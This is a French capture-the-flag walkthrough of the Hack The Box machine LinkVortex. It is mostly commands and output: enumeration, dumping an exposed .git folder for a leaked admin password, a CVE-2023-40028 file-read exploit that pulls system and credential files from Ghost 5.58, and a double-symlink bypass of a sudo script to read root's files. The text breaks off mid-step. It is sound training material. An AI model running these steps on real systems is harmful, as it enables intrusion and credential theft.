data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.47 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 3ef8b968c8eb570fcb0b47b9865083eb <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> a2ea6ee1b6d7e7c58669ceba059e3813 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://linkvortex.htb/ </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="linkvortexhtb---ghost-558">linkvortex.htb - Ghost 5.58 </h3><p>On se connecte au port 80 qui nous redirige vers : <a class="link" href="http://linkvortex.htb" target="_blank" rel="noopener" >http://linkvortex.htb</a> A l&rsquo;aide <strong>Wappalyzer</strong>, on identifie <strong>Ghost CMS</strong> version 5.58.</p> <h3 id="subdomain-enumeration---dev">Subdomain Enumeration - dev </h3><blockquote> <p>dev.linkvortex.htb</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ gobuster vhost -u <span class="s2">&#34;linkvortex.htb&#34;</span> -w <span class="sb">`</span>fzf-wordlists<span class="sb">`</span> --append-domain </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Url: http://linkvortex.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Method: GET </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">10</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /opt/lists/seclists/Discovery/DNS/subdomains-top1million-110000.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> User Agent: gobuster/3.6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: 10s </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Append Domain: <span class="nb">true</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in VHOST enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Found: dev.linkvortex.htb Status: <span class="m">200</span> <span class="o">[</span>Size: 2538<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ cat /etc/hosts </span></span><span class="line"><span class="cl">10.10.11.47 linkvortex.htb dev.linkvortex.htb </span></span></code></pre></td></tr></table> </div> </div><h3 id="git">.git </h3><p>On trouve un fichier <strong>.git</strong>, on peut alors récupérer ce dossier git et l&rsquo;analyser avec <strong>git-dumper</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ dirsearch -u http://dev.linkvortex.htb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> _<span class="p">|</span>. _ _ _ _ _ _<span class="p">|</span>_ v0.4.3 </span></span><span class="line"><span class="cl"> <span class="o">(</span>_<span class="o">||</span><span class="p">|</span> _<span class="o">)</span> <span class="o">(</span>/_<span class="o">(</span>_<span class="o">||</span> <span class="o">(</span>_<span class="p">|</span> <span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extensions: php, asp, aspx, jsp, html, htm <span class="p">|</span> HTTP method: GET <span class="p">|</span> Threads: <span class="m">25</span> <span class="p">|</span> Wordlist size: <span class="m">12289</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Target: http://dev.linkvortex.htb/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>17:09:04<span class="o">]</span> Scanning: </span></span><span class="line"><span class="cl"><span class="o">[</span>17:09:04<span class="o">]</span> <span class="m">301</span> - 239B - /.git -&gt; http://dev.linkvortex.htb/.git/ </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="git-dumper---password-found">git-dumper - Password Found </h3><p>On dump les fichiers du <strong>.git</strong> avec git-dumper :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ git-dumper http://dev.linkvortex.htb/.git ./git-dump/ </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Testing http://dev.linkvortex.htb/.git/HEAD <span class="o">[</span>200<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Testing http://dev.linkvortex.htb/.git/ <span class="o">[</span>200<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Fetching .git recursively </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Fetching http://dev.linkvortex.htb/.gitignore <span class="o">[</span>404<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> http://dev.linkvortex.htb/.gitignore responded with status code <span class="m">404</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Fetching http://dev.linkvortex.htb/.git/objects/50/864e0261278525197724b394ed4292414d9fec <span class="o">[</span>200<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Sanitizing .git/config </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Running git checkout . </span></span><span class="line"><span class="cl">Updated <span class="m">5596</span> paths from the index </span></span></code></pre></td></tr></table> </div> </div><p>J&rsquo;ai cloné la véritable version de Ghost 5.58 et j&rsquo;ai fais un diff avec le dump du .</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ wget https://github.com/TryGhost/Ghost/archive/refs/tags/v5.58.0.zip </span></span><span class="line"><span class="cl">$ unzip v5.58.0.zip </span></span><span class="line"><span class="cl">$ diff -r ./Ghost-5.58.0 ./git-dump </span></span><span class="line"><span class="cl">Only in ./git-dump: Dockerfile.ghost </span></span><span class="line"><span class="cl">diff --color -r ./Ghost-5.58.0/ghost/core/test/regression/api/admin/authentication.test.js ./git-dump/ghost/core/test/regression/api/admin/authentication.test.js </span></span><span class="line"><span class="cl">56c56 </span></span><span class="line"><span class="cl">&lt; const <span class="nv">password</span> <span class="o">=</span> <span class="s1">&#39;thisissupersafe&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl">--- </span></span><span class="line"><span class="cl">&gt; const <span class="nv">password</span> <span class="o">=</span> <span class="s1">&#39;OctopiFociPilfer45&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl">Only in ./git-dump: .git </span></span></code></pre></td></tr></table> </div> </div><p>password : <code>OctopiFociPilfer45</code></p> <h3 id="ghost-dashboard">Ghost Dashboard </h3><p>On trouve une page de login permettant d&rsquo;accéeder au <strong>dashboard</strong> de <strong>Ghost</strong> :</p> <blockquote> <p><a class="link" href="http://linkvortex.htb/ghost" target="_blank" rel="noopener" >http://linkvortex.htb/ghost</a></p> </blockquote> <p>Intuitivement, on essaye de se connecter avec cette adresse email :</p> <ul> <li><a class="link" href="mailto:admin@linkvortex.htb" >admin@linkvortex.htb</a></li> </ul> <p>Credentials :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">admin@linkvortex.htb </span></span><span class="line"><span class="cl">OctopiFociPilfer45 </span></span></code></pre></td></tr></table> </div> </div><h3 id="ghost-arbitrary-file-read-exploit">Ghost Arbitrary File Read Exploit </h3><p>Après quelques recherches concernant la version 5.58 de Ghost, on trouve la <strong>CVE-2023-40028</strong> permettant de lire n&rsquo;importe quel fichier sur la machine de manière arbitraire en utilisant un le compte administrateur.</p> <blockquote> <p><a class="link" href="https://github.com/0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028" target="_blank" rel="noopener" >https://github.com/0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028</a></p> </blockquote> <p>En utilisant la CVE, on tente de lire plusieurs fichiers. Dans <strong>/etc/passwd</strong>, seul l&rsquo;utilisateur &ldquo;node&rdquo; semble avoir un dossier /home, ce qui est étonnant. Ensuite, on trouve le fichier /etc/hosts qui contient :</p> <ul> <li>172.20.0.2 484b975c6616</li> </ul> <p>Après vérification, les containers docker on souvent une ip en 172.x.x.x . L&rsquo;hostname en hexadecimal fait également penser a un container docker.</p> <p>De plus, on sait que l&rsquo;application marche avec <strong>Node JS</strong>, et par défaut, les applications node js sont installées dans :</p> <ul> <li><strong>/var/lib/[App]</strong></li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ./exploit.sh -u admin@linkvortex.htb -p <span class="s1">&#39;OctopiFociPilfer45&#39;</span> -h http://linkvortex.htb </span></span><span class="line"><span class="cl">WELCOME TO THE CVE-2023-40028 SHELL </span></span><span class="line"><span class="cl">Enter the file path to <span class="nb">read</span> <span class="o">(</span>or <span class="nb">type</span> <span class="s1">&#39;exit&#39;</span> to quit<span class="o">)</span>: /etc/hosts </span></span><span class="line"><span class="cl">File content: </span></span><span class="line"><span class="cl">127.0.0.1 localhost </span></span><span class="line"><span class="cl">::1 localhost ip6-localhost ip6-loopback </span></span><span class="line"><span class="cl">fe00::0 ip6-localnet </span></span><span class="line"><span class="cl">ff00::0 ip6-mcastprefix </span></span><span class="line"><span class="cl">ff02::1 ip6-allnodes </span></span><span class="line"><span class="cl">ff02::2 ip6-allrouters </span></span><span class="line"><span class="cl">172.20.0.2 484b975c6616 </span></span></code></pre></td></tr></table> </div> </div><p>Par déduction, on tente donc de récupérer le fichier de configuration de l&rsquo;application ghost :</p> <blockquote> <p>/var/lib/ghost/config.production.json</p> </blockquote> <p>On trouve des credentials semblant permettre l&rsquo;utilisation d&rsquo;un serveur mail <strong>SMTP</strong> :</p> <blockquote> <p><a class="link" href="mailto:bob@linkvortex.htb" >bob@linkvortex.htb</a><br> fibber-talented-worth</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Enter the file path to <span class="nb">read</span> <span class="o">(</span>or <span class="nb">type</span> <span class="s1">&#39;exit&#39;</span> to quit<span class="o">)</span>: /var/lib/ghost/config.production.json </span></span><span class="line"><span class="cl">File content: </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;url&#34;</span>: <span class="s2">&#34;http://localhost:2368&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;server&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;port&#34;</span>: 2368, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;host&#34;</span>: <span class="s2">&#34;::&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mail&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;transport&#34;</span>: <span class="s2">&#34;SMTP&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;options&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;service&#34;</span>: <span class="s2">&#34;Google&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;host&#34;</span>: <span class="s2">&#34;linkvortex.htb&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;port&#34;</span>: 587, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;auth&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;user&#34;</span>: <span class="s2">&#34;bob@linkvortex.htb&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;pass&#34;</span>: <span class="s2">&#34;fibber-talented-worth&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh-to-bob">SSH to bob </h3><p>On peut finalement se connecter en SSH avec le compte utilisateur bob :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ssh bob@10.10.11.47 </span></span><span class="line"><span class="cl">bob@10.10.11.47<span class="s1">&#39;s password: # &lt;&lt;&lt;&lt; fibber-talented-worth </span></span></span><span class="line"><span class="cl"><span class="s1">Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64) </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> * Documentation: https://help.ubuntu.com </span></span></span><span class="line"><span class="cl"><span class="s1"> * Management: https://landscape.canonical.com </span></span></span><span class="line"><span class="cl"><span class="s1"> * Support: https://ubuntu.com/pro </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">This system has been minimized by removing packages and content that are </span></span></span><span class="line"><span class="cl"><span class="s1">not required on a system that users do not log into. </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">To restore this content, you can run the &#39;</span>unminimize<span class="err">&#39;</span> command. </span></span><span class="line"><span class="cl">Last login: Tue Dec <span class="m">3</span> 11:41:50 <span class="m">2024</span> from 10.10.14.62 </span></span><span class="line"><span class="cl">-bash: warning: setlocale: LC_ALL: cannot change locale <span class="o">(</span>en_US.UTF-8<span class="o">)</span> </span></span><span class="line"><span class="cl">bob@linkvortex:~$ cat user.txt </span></span><span class="line"><span class="cl">80f2.....24bb </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="enumeration-1">Enumeration </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">bob@linkvortex:~$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> bob on linkvortex: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin, use_pty, <span class="nv">env_keep</span><span class="o">+=</span>CHECK_CONTENT </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User bob may run the following commands on linkvortex: </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png </span></span></code></pre></td></tr></table> </div> </div><h3 id="clean_symlinksh-as-root">clean_symlink.sh as root </h3><p>On peut executer ce script en tant que root, en passant fichier avec l&rsquo;extension &ldquo;.png&rdquo; : <code>/opt/ghost/clean_symlink.sh</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="cp">#!/bin/bash </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">QUAR_DIR</span><span class="o">=</span><span class="s2">&#34;/var/quarantined&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="o">[</span> -z <span class="nv">$CHECK_CONTENT</span> <span class="o">]</span><span class="p">;</span><span class="k">then</span> </span></span><span class="line"><span class="cl"> <span class="nv">CHECK_CONTENT</span><span class="o">=</span><span class="nb">false</span> </span></span><span class="line"><span class="cl"><span class="k">fi</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">LINK</span><span class="o">=</span><span class="nv">$1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> ! <span class="o">[[</span> <span class="s2">&#34;</span><span class="nv">$LINK</span><span class="s2">&#34;</span> <span class="o">=</span>~ <span class="se">\.</span>png$ <span class="o">]]</span><span class="p">;</span> <span class="k">then</span> </span></span><span class="line"><span class="cl"> /usr/bin/echo <span class="s2">&#34;! First argument must be a png file !&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nb">exit</span> <span class="m">2</span> </span></span><span class="line"><span class="cl"><span class="k">fi</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> /usr/bin/sudo /usr/bin/test -L <span class="nv">$LINK</span><span class="p">;</span><span class="k">then</span> </span></span><span class="line"><span class="cl"> <span class="nv">LINK_NAME</span><span class="o">=</span><span class="k">$(</span>/usr/bin/basename <span class="nv">$LINK</span><span class="k">)</span> </span></span><span class="line"><span class="cl"> <span class="nv">LINK_TARGET</span><span class="o">=</span><span class="k">$(</span>/usr/bin/readlink <span class="nv">$LINK</span><span class="k">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> /usr/bin/echo <span class="s2">&#34;</span><span class="nv">$LINK_TARGET</span><span class="s2">&#34;</span> <span class="p">|</span> /usr/bin/grep -Eq <span class="s1">&#39;(etc|root)&#39;</span><span class="p">;</span><span class="k">then</span> </span></span><span class="line"><span class="cl"> /usr/bin/echo <span class="s2">&#34;! Trying to read critical files, removing link [ </span><span class="nv">$LINK</span><span class="s2"> ] !&#34;</span> </span></span><span class="line"><span class="cl"> /usr/bin/unlink <span class="nv">$LINK</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> /usr/bin/echo <span class="s2">&#34;Link found [ </span><span class="nv">$LINK</span><span class="s2"> ] , moving it to quarantine&#34;</span> </span></span><span class="line"><span class="cl"> /usr/bin/mv <span class="nv">$LINK</span> <span class="nv">$QUAR_DIR</span>/ </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="nv">$CHECK_CONTENT</span><span class="p">;</span><span class="k">then</span> </span></span><span class="line"><span class="cl"> /usr/bin/echo <span class="s2">&#34;Content:&#34;</span> </span></span><span class="line"><span class="cl"> /usr/bin/cat <span class="nv">$QUAR_DIR</span>/<span class="nv">$LINK_NAME</span> 2&gt;/dev/null </span></span><span class="line"><span class="cl"> <span class="k">fi</span> </span></span><span class="line"><span class="cl"> <span class="k">fi</span> </span></span><span class="line"><span class="cl"><span class="k">fi</span> </span></span></code></pre></td></tr></table> </div> </div><p>1ère essai :</p> <ul> <li>Creation d&rsquo;un symlink n00b.png qui pointe vers /root/root.txt</li> <li>Execution du script <ul> <li>ERROR : &ldquo;! Trying to read critical files, removing link [ n00b.png ] !&rdquo;</li> </ul> </li> </ul> <p>On remarque que le script utilise <strong>readlink</strong> pour vérifier où pointe notre symlink. S&rsquo;il pointe vers un fichier dans contenant dans son path &ldquo;etc&rdquo; ou &ldquo;root&rdquo; il ne le lit pas.</p> <p>Pour bypasser cette protection, il suffit de créer deux symlink :</p> <ul> <li>1er symlink : n00b pointe vers /root/root.txt</li> <li>2ème symlink : exploit.png pointe vers n00b</li> </ul> <p>Lorsqu&rsquo;il vérifie où pointe le symlink exploit.png il trouve &ldquo;n00b&rdquo; et autorise donc sa lecture. Or, comme n00b pointe vers root.txt, le fichier s&rsquo;affiche dans le terminal :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">bob@linkvortex:/var/quarantined$ ln -s /root/root.txt n00b </span></span><span class="line"><span class="cl">bob@linkvortex:/var/quarantined$ ls </span></span><span class="line"><span class="cl">n00b </span></span><span class="line"><span class="cl">bob@linkvortex:/var/quarantined$ ln -s n00b exploit.png </span></span><span class="line"><span class="cl">bob@linkvortex:/var/quarantined$ ls </span></span><span class="line"><span class="cl">exploit.png n00b </span></span><span class="line"><span class="cl">bob@linkvortex:/var/quarantined$ ls -lah </span></span><span class="line"><span class="cl">total 8.0K </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">2</span> bob bob 4.0K Oct <span class="m">22</span> 22:46 . </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">14</span> root root 4.0K Nov <span class="m">29</span> <span class="m">2024</span> .. </span></span><span class="line"><span class="cl">lrwxrwxrwx <span class="m">1</span> bob bob <span class="m">4</span> Oct <span class="m">22</span> 22:46 exploit.png -&gt; n00b </span></span><span class="line"><span class="cl">lrwxrwxrwx <span class="m">1</span> bob bob <span class="m">14</span> Oct <span class="m">22</span> 22:45 n00b -&gt; /root/root.txt </span></span><span class="line"><span class="cl">bob@linkvortex:/var/quarantined$ cat n00b </span></span><span class="line"><span class="cl">cat: n00b: Permission denied </span></span><span class="line"><span class="cl">bob@linkvortex:/var/quarantined$ sudo /usr/bin/bash /opt/ghost/clean_symlink.sh exploit.png </span></span><span class="line"><span class="cl">Link found <span class="o">[</span> exploit.png <span class="o">]</span> , moving it to quarantine </span></span><span class="line"><span class="cl">/usr/bin/mv: <span class="s1">&#39;exploit.png&#39;</span> and <span class="s1">&#39;/var/quarantined/exploit.png&#39;</span> are the same file </span></span><span class="line"><span class="cl">Content: </span></span><span class="line"><span class="cl">5f3e.....aebc9 </span></span></code></pre></td></tr></table> </div> </div><h3 id="root-shell">Root shell </h3><p>On utilise l&rsquo;exploit pour lire la clé SSH de l&rsquo;utilisateur root et se connecter en SSH :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">bob@linkvortex:/var/quarantined$ ln -s /root/.ssh/id_rsa n00b </span></span><span class="line"><span class="cl">bob@linkvortex:/var/quarantined$ 